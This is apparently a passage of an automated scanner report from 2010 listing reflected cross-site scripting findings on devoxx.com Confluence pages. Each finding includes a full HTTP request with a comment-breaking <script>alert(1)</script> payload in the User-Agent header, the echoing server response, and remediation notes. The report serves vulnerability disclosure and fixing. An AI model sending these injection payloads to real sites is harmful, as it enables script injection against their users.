Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Practical HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836934
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Practical' contextPath : '' action name : 'viewpage' *** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload bfcd2--><script>alert(1)</script>4082871896 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Privacy+Policy HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:05 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842985586
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 41986
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Privacy+Policy' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9affa--><script>alert(1)</script>0ec3a0f0447 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836081
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38721
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4e81e--><script>alert(1)</script>e07c32ab7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule+REST+interface HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:08 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842928576
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 75557
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule+REST+interface' contextPath : '' action name : 'vi ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 3b336--><script>alert(1)</script>4650d9ff903 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedules HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:45 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842905939
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 44899
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedules' contextPath : '' action name : 'viewpage' *** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload ae756--><script>alert(1)</script>b9448b28231 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sidebar HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:27 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842827436
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34272
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sidebar' contextPath : '' action name : 'viewpage' ***** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload c81b5--><script>alert(1)</script>5594fe23ee7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sponsors HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:01 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842981133
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 42422
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sponsors' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 29266--><script>alert(1)</script>6dfe39b9927 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Twitter HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:28 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843008668
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 48596
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Twitter' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload d93d1--><script>alert(1)</script>8a3892b45b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.